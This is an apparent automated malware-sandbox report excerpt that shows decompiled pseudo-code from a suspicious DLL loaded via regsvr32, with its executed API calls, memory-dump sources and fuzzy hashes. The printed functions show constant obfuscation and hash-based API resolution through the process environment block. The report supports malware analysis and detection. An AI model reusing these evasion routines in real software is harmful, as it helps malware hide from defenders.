				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t69);
				_v8 = 0x819b57;
				_v8 = _v8 >> 0x10;
				_t83 = 0x17;
				_v8 = _v8 / _t83;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x00008000;
				_v24 = 0x7d8883;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 + 0xffff5cfc;
				_v24 = _v24 ^ 0xfff105d0;
				_v16 = 0x4e701e;
				_v16 = _v16 ^ 0xb2bd4297;
				_t84 = 0x5b;
				_v16 = _v16 / _t84;
				_t85 = 0x7f;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000cfa43;
				_v12 = 0xc80371;
				_t86 = 0x37;
				_v12 = _v12 / _t86;
				_v12 = _v12 >> 1;
				_t87 = 0x79;
				_v12 = _v12 / _t87;
				_v12 = _v12 ^ 0x0004b486;
				_v20 = 0xa43314;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0xa205;
				_v20 = _v20 ^ 0x052abea0;
				return E02B3F8A9(_v24, _v16, __edx, _v12, _v8, _v20);
			}

0x02b3f0f0
0x02b3f0f5
0x02b3f0f8
0x02b3f0f9
0x02b3f0fa
0x02b3f0ff
0x02b3f108
0x02b3f111
0x02b3f116
0x02b3f11b
0x02b3f11f
0x02b3f126
0x02b3f12d
0x02b3f131
0x02b3f138
0x02b3f13f
0x02b3f146
0x02b3f150
0x02b3f155
0x02b3f15d
0x02b3f162
0x02b3f167
0x02b3f16e
0x02b3f178
0x02b3f17d
0x02b3f182
0x02b3f188
0x02b3f18b
0x02b3f18e
0x02b3f195
0x02b3f19c
0x02b3f1a0
0x02b3f1a7
0x02b3f1ca

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
Instruction ID: c08536fbaca07521728e838757c028b4c2bf7de73b5523e5eadbb3a58432cf77
Opcode Fuzzy Hash: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
Instruction Fuzzy Hash: 17213776E00209EBDF08CFE5C8099EEBBB2EB44314F20C09AD5146B290D7B15B14DF80

Uniqueness

Uniqueness Score: -1.00%

Function 02B4567B, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02B4567B(void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t66;
				void* _t70;
				signed int _t71;
				signed int _t72;
				intOrPtr* _t81;
				intOrPtr* _t82;
				void* _t83;

				_v16 = 0x3cd044;
				_v16 = _v16 + 0x8a1e;
				_t70 = __edx;
				_t71 = 0x23;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000ceb59;
				_v20 = 0x98fec3;
				_v20 = _v20 + 0x117b;
				_v20 = _v20 ^ 0x00928bce;
				_v12 = 0xc66557;
				_v12 = _v12 | 0xbd5cb058;
				_t72 = 0x6a;
				_v12 = _v12 / _t72;
				_v12 = _v12 * 0x5e;
				_v12 = _v12 ^ 0xa86b283b;
				_v8 = 0xf205aa;
				_v8 = _v8 ^ 0x840ccd49;
				_v8 = _v8 + 0x2990;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0003f43b;
				_v28 = 0xeebda;
				_v28 = _v28 + 0xdccc;
				_v28 = _v28 ^ 0x00000347;
				_v24 = 0xa36d5e;
				_v24 = _v24 | 0xd0b00948;
				_v24 = _v24 ^ 0xd0bd6ebb;
				_t81 =  *((intOrPtr*)(E02B3F7F7() + 0xc)) + 0xc;
				_t82 =  *_t81;
				while(_t82 != _t81) {
					_t66 = E02B3EFE1(_v8, _v28, _v24,  *((intOrPtr*)(_t82 + 0x30)));
					_t83 = _t83 + 0xc;
					if((_t66 ^ 0x2d567c83) == _t70) {
						return  *((intOrPtr*)(_t82 + 0x18));
					}
					_t82 =  *_t82;
				}
				return 0;
			}

0x02b45681
0x02b45688
0x02b45695
0x02b4569b
0x02b456a0
0x02b456a5
0x02b456ac
0x02b456b3
0x02b456ba
0x02b456c1
0x02b456c8
0x02b456d2
0x02b456d5
0x02b456dc
0x02b456df
0x02b456e6
0x02b456ed
0x02b456f4
0x02b456fb
0x02b456ff
0x02b45706
0x02b4570d
0x02b45714
0x02b4571b
0x02b45722
0x02b45729
0x02b4573e
0x02b45741
0x02b45767
0x02b45754
0x02b4575e
0x02b45763
0x00000000
0x02b45774
0x02b45765
0x02b45765
0x00000000

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
Instruction ID: 04459c76c1e9afd9639774270f29ec9aae3c5b478cfa0663039fb01b41451acd
Opcode Fuzzy Hash: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
Instruction Fuzzy Hash: EA312A72E00209EFDB64DFA5C9898AEFBB1FB40314F2480A9D515B7210D7B45B55DF80

Uniqueness

Uniqueness Score: -1.00%

Function 02B40EBC, Relevance: .1, Instructions: 58
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E02B40EBC(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a28, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t44;
				intOrPtr* _t51;

				E02B4FE29(_t44);
				_v20 = 0x5f9276;
				_v20 = _v20 >> 6;
				_v20 = _v20 >> 0xa;
				_v20 = _v20 ^ 0x0000ae6f;
				_v16 = 0x7df0fb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x9952d77b;
				_v16 = _v16 ^ 0x9951c792;
				_v12 = 0xf93209;
				_v12 = _v12 | 0xf37a8f1a;
				_v12 = _v12 + 0xffff09ac;
				_v12 = _v12 + 0xa761;
				_v12 = _v12 ^ 0xf3f42664;
				_v8 = 0x4c6886;
				_v8 = _v8 ^ 0x2aaf40fd;
				_v8 = _v8 * 0x7c;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x0632021c;
				_t51 = E02B3EB52(__ecx, __ecx, 0xc0c22a7, 0x4d, 0xa2289af1);
				return  *_t51(0, 0, _a32, _a28, 0, 0, __ecx, 0, _a4, 0, _a12, _a16, 0, 0, _a28, _a32);
			}

0x02b40ed9
0x02b40ede
0x02b40ee8
0x02b40eec
0x02b40ef0
0x02b40ef7
0x02b40efe
0x02b40f02
0x02b40f09
0x02b40f10
0x02b40f17
0x02b40f1e
0x02b40f25
0x02b40f2c
0x02b40f33
0x02b40f3a
0x02b40f52
0x02b40f55
0x02b40f59
0x02b40f6d
0x02b40f85

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
Instruction ID: 654381771979f8c4a100fc3214213d232ba432dd0b28e78d23e67e03b3d704b9
Opcode Fuzzy Hash: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
Instruction Fuzzy Hash: 5C210E71801219FBCF19DFA1CD4A8DEBFB4FF08354F108688A958A2220D3798A14DF91

Uniqueness

Uniqueness Score: -1.00%

Function 02B3EF0C, Relevance: .1, Instructions: 56
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E02B3EF0C(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _t57;
				signed int _t67;

				_v28 = 4;
				_v24 = 0xd6e1b5;
				_v24 = _v24 | 0x5e4e7cd1;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x20005ede;
				_v12 = 0x35fbf9;
				_v12 = _v12 << 2;
				_v12 = _v12 + 0xffffd421;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x000779ff;
				_v8 = 0xb66603;
				_v8 = _v8 | 0x4ba1ba6b;
				_v8 = _v8 ^ 0x6df4d1b9;
				_v8 = _v8 ^ 0x1286fe83;
				_v8 = _v8 ^ 0x34cd5dfe;
				_v20 = 0x1bb0b6;
				_v20 = _v20 | 0x21937f20;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x19bd1c5b;
				_v16 = 0xd95204;
				_v16 = _v16 ^ 0x6876e9a1;
				_t67 = 0x62;
				_v16 = _v16 / _t67;
				_v16 = _v16 ^ 0x01180520;
				_t57 = E02B460B8(_v12, _v24 | __edx, _v8,  &_v28,  &_v32, __ecx, __ecx, _v20, _v16);
				asm("sbb eax, eax");
				return  ~_t57 & _v32;
			}

0x02b3ef12
0x02b3ef19
0x02b3ef20
0x02b3ef27
0x02b3ef2b
0x02b3ef32
0x02b3ef39
0x02b3ef3d
0x02b3ef44
0x02b3ef48
0x02b3ef4f
0x02b3ef56
0x02b3ef5d
0x02b3ef64
0x02b3ef6b
0x02b3ef72
0x02b3ef79
0x02b3ef80
0x02b3ef84
0x02b3ef8d
0x02b3ef96
0x02b3efa4
0x02b3efa7
0x02b3efad
0x02b3efcc
0x02b3efd6
0x02b3efe0

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
Instruction ID: 11e6dea34a00948076b5d3b07d7363272030b684f61606266027a1f0966ef71e
Opcode Fuzzy Hash: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
Instruction Fuzzy Hash: 7C21E372C0120DABDB09DFE5CA4A5EFFBB5EB44204F608299D512B6220D3B55B059FA2

Uniqueness

Uniqueness Score: -1.00%

Function 02B3C5D8, Relevance: .1, Instructions: 53
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02B3C5D8(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _t69;
				signed int _t70;

				_v32 = _v32 & 0x00000000;
				_v36 = 0xa0afa0;
				_v28 = 0x9adc8d;
				_v28 = _v28 ^ 0x90925320;
				_v28 = _v28 ^ 0x90088fa5;
				_v24 = 0x1cb3a6;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0xb3a3d0bd;
				_v8 = 0xc8bfd2;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0x77b2;
				_t69 = 0x16;
				_v8 = _v8 / _t69;
				_v8 = _v8 ^ 0x0000123c;
				_v20 = 0x3ff815;
				_v20 = _v20 | 0x9e661a12;
				_v20 = _v20 + 0x3006;
				_v20 = _v20 ^ 0x9e825c55;
				_v12 = 0xda9b76;
				_t70 = 0x6b;
				_v12 = _v12 / _t70;
				_v12 = _v12 | 0xed94e7c2;
				_v12 = _v12 + 0xffffd684;
				_v12 = _v12 ^ 0xed94606e;
				_v16 = 0x191c50;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x00013f6e;
				return E02B4648A(_a4, _v20, _v12, _v16, E02B528EB(), _v28);
			}

0x02b3c5de
0x02b3c5e4
0x02b3c5eb
0x02b3c5f2
0x02b3c5f9
0x02b3c600
0x02b3c607
0x02b3c60b
0x02b3c612
0x02b3c619
0x02b3c61d
0x02b3c629
0x02b3c62e
0x02b3c633
0x02b3c63a
0x02b3c641
0x02b3c648
0x02b3c64f
0x02b3c656
0x02b3c660
0x02b3c663
0x02b3c666
0x02b3c66d
0x02b3c674
0x02b3c67b
0x02b3c682
0x02b3c686
0x02b3c68a
0x02b3c6b7

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
Instruction ID: a0c798d0b0a3b0c35d66c3b3fef8f73a208b070d460a60ccf37c0ac8466c9224
Opcode Fuzzy Hash: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
Instruction Fuzzy Hash: 5221FEB5D0020DEBDF08DFE1C98A5EEBBB2BB54718F208088D525B6264D7B94B548F91

Uniqueness

Uniqueness Score: -1.00%

Function 02B3F7F7, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B3F7F7() {

				return  *[fs:0x30];
			}

0x02b3f7fd

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 6932 Parent PID: 6788 regsvr32.exeCOMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.1%
Total number of Nodes:	1187
Total number of Limit Nodes:	22

Executed Functions

Function 10002D40, Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100024A0: SetLastError.KERNEL32(0000000D,?,?,10002D65,1001DF0A,00000040), ref: 100024B1

SetLastError.KERNEL32(000000C1,1001DF0A,00000040), ref: 10002D88

Strings

`Nt, xrefs: 10002E9B
Ot, xrefs: 10002F36

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID: Ot$`Nt
API String ID: 1452528299-908354541
Opcode ID: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
Opcode Fuzzy Hash: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002ADAC, Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
GlobalHandle.KERNEL32(02EA4018), ref: 1002AE1E
GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
GlobalReAlloc.KERNEL32 ref: 1002AE41
GlobalHandle.KERNEL32(02EA4018), ref: 1002AE53
GlobalLock.KERNEL32 ref: 1002AE5A
LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
GlobalLock.KERNEL32 ref: 1002AE6F
_memset.LIBCMT ref: 1002AE89
LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
Instruction ID: 1a22abfe9f33a297b41a0f192d06fc5d98366496c497f4e189800256e1e6bccf
Opcode Fuzzy Hash: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
Instruction Fuzzy Hash: 1E31AD71600715AFEB21CF68DD89A1BBBF9FF46301B42892DE55AD3661DB30F8818B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002E577, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 1002E595

Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F

___sbh_find_block.LIBCMT ref: 1002E5A0
___sbh_free_block.LIBCMT ref: 1002E5AF
RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
Instruction ID: 15e9110145b1e9c1bde58837c3f2254f90dacbefcca8cfa7097211139088966e
Opcode Fuzzy Hash: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
Instruction Fuzzy Hash: E001A7358567669EEB21DBB1AC0574D3BE4FF01796F900415F404AA4D1DF34AD40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 100036A0, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 937
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 100036BB

Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB

Strings

+';, xrefs: 100036A0

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID: +';
API String ID: 501242067-2694261586
Opcode ID: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
Instruction ID: 8c5fde967666ed0afc5dc7c826d0591e9b318715144b3c37a2536eafdc0580d3
Opcode Fuzzy Hash: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
Instruction Fuzzy Hash: 8FB21B369120218FE70ADFACDED5F257BA6F794608747B21FC4018737ADE306464CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 10003440, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9

_malloc.LIBCMT ref: 100034B7

Strings

+';, xrefs: 10003440

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: _malloc
String ID: +';
API String ID: 1579825452-2694261586
Opcode ID: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
Instruction ID: 6db3f6523064f320fd84e53d4013fc8a18f56f5699846b59c9fd9a4c566afa3d
Opcode Fuzzy Hash: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
Instruction Fuzzy Hash: B891E770E04649AFDB09CF98C490AAEBBB2FF85345F24C199D915AB359C335AA90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10002690, Relevance: 3.1, APIs: 2, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10002928,00000001,00000000,?,100030A8,?,?,?,?,100030A8,00000000,00000000), ref: 10002704

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 100024D0, Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
Opcode Fuzzy Hash: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10024BD0, Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 10024BD7

Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F

Part of subcall function 1002AC5C: LocalAlloc.KERNEL32(00000040,?,?,1002AFE7,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AC66

